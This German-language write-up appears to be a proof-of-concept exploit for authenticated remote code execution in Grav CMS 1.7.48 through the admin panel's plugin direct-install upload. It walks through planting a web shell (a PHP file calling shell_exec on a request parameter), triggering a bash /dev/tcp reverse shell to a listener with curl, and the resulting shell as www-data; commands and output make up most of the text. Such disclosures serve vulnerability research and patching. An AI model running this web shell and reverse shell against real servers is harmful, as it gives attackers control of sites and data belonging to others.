
Authentifizierter RCE-Exploit für Grav CMS über Plugin-Upload, der beliebige PHP-Codeausführung und Reverse-Shell demonstriert.
Grav CMS v1.7.48 mit Admin Plugin v1.10.48 ist anfällig für Remote Code Execution (RCE) über die „Direct Install“-Plugin-Upload-Funktion, die authentifizierten Administratoren erlaubt, beliebigen PHP-Code auf dem Server auszuführen.
/admin/tools/direct-install (Admin-Panel > Werkzeuge > Direktinstallation)Bereiten Sie einen Listener vor:
nc -lvnp 4444
Melden Sie sich als Administrator im Grav Admin-Panel an.
Navigieren Sie zu Werkzeuge > Direktinstallation
Laden Sie eine bösartige Plugin-ZIP (evilplugin.zip) mit folgender Struktur hoch:
evilplugin/
├── evilplugin.php ← enthält: shell_exec($_GET['cmd'])
└── blueprints.yaml ← minimales Blueprint zur Validierung
Lösen Sie die Reverse Shell aus:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
Reverse Shell empfangen:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installNur zu Bildungs- und Sicherungszwecken.